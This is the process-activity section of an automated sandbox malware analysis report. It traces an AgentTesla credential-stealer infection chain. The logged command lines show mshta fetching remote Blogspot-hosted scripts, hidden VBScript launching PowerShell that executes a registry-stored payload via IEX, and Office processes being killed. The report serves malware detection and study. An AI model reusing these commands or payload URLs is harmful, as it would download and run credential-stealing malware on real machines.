                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:43
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
                                                                                                                                                                                                            Imagebase:0x4ab60000
                                                                                                                                                                                                            File size:345088 bytes
                                                                                                                                                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:46
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close')
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:46
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:taskkill /f /im winword.exe
                                                                                                                                                                                                            Imagebase:0xff4f0000
                                                                                                                                                                                                            File size:112640 bytes
                                                                                                                                                                                                            MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:47
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
                                                                                                                                                                                                            Imagebase:0x21ac0000
                                                                                                                                                                                                            File size:452608 bytes
                                                                                                                                                                                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:47
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:taskkill /f /im EXCEL.exe
                                                                                                                                                                                                            Imagebase:0xffdb0000
                                                                                                                                                                                                            File size:112640 bytes
                                                                                                                                                                                                            MD5 hash:3722FA501DCB50AE42818F9034906891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:48
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
                                                                                                                                                                                                            Imagebase:0x13fcb0000
                                                                                                                                                                                                            File size:473600 bytes
                                                                                                                                                                                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:51
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            Imagebase:0x12b0000
                                                                                                                                                                                                            File size:261944 bytes
                                                                                                                                                                                                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:54
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close')
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:44:57
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:45:02
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
                                                                                                                                                                                                            Imagebase:0x21ac0000
                                                                                                                                                                                                            File size:452608 bytes
                                                                                                                                                                                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:45:02
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close')
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:45:04
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:45:10
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close')
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:13:45:12
                                                                                                                                                                                                            Start date:13/01/2021
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
                                                                                                                                                                                                            Imagebase:0x13f4d0000
                                                                                                                                                                                                            File size:13824 bytes
                                                                                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                            Reset < >